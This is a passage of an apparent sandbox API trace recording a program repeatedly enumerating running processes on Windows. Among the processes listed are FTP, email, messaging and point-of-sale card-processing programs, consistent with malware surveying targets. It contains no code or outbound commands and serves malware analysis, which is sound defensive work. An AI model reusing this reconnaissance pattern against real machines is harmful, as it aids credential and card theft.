th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0183.544] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0183.546] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0183.548] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0183.552] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0183.554] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0183.560] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0183.563] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0183.566] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0183.569] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0183.571] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0183.574] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0183.578] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0183.581] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0183.583] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0183.587] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0183.589] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0183.592] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0183.594] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0183.602] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0183.604] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0183.607] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0183.610] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0183.612] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0183.615] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0183.621] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0183.623] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0183.626] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0183.628] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0183.630] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0183.635] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0183.638] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0183.640] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0183.646] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0183.649] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0183.652] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0183.654] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0183.656] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0183.658] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0183.661] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0183.663] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0183.666] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.668] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0183.670] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0183.673] CloseHandle (hObject=0x192c) returned 1 [0183.673] Sleep (dwMilliseconds=0x64) [0183.807] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1998 [0183.822] Process32First (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.824] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0183.827] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0183.829] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.831] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0183.833] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.835] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0183.837] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0183.839] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0183.841] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.891] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.893] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0183.895] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.898] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.900] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.902] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.904] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.906] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.908] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.911] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0183.913] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0183.915] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.919] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0183.922] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.937] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0184.071] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0184.075] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0184.077] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0184.078] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0184.080] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0184.082] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.083] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.085] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0184.089] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.092] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.093] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.095] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.097] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0184.099] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0184.101] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0184.102] Process32Next (in: hSnapshot=0x1998, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, 